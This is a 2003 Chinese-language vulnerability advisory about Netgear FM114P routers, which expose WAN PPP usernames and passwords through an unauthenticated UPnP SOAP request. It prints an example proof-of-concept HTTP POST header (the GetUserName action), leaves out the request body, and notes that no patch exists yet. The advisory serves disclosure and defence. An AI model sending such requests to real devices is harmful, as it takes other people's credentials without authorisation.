发布日期：2003-04-03
更新日期：2003-04-08

受影响系统：

Netgear FM114P

描述：

---

BUGTRAQ  ID: 7267

Netgear FM114P ProSafe是一款无线网络路由器。

Netgear FM114P ProSafe无线网络路由器在使用UPnP功能时存在漏洞，远程攻击者可以利用这个漏洞获得WAN接口用户名和密码信息。

如果设备中远程访问和UPnP功能开启的情况下，远程用户可以不用验证获得Netgear FM114P ProSafe连接的用户名和密码信息，这可以通过提交UPnP soap请求给WAN接口而获得。

<*来源：Bj?rn Stickler （stickler@rbg.informatik.tu-darmstadt.de）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=104940655818917&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Bj?rn Stickler （stickler@rbg.informatik.tu-darmstadt.de）提供了如下测试方法：

---- begin of example request to get username --------------

POST /upnp/service/WANPPPConnection HTTP/1.1
HOST: 192.168.0.1:80
SOAPACTION: "urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
CONTENT-TYPE: text/xml ; charset="utf-8"
Content-Length: 289


---- end of example request to get username   --------------

建议：

---

厂商补丁：

Netgear
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.netgear.com/

浏览次数：2936
严重程度：0（网友投票）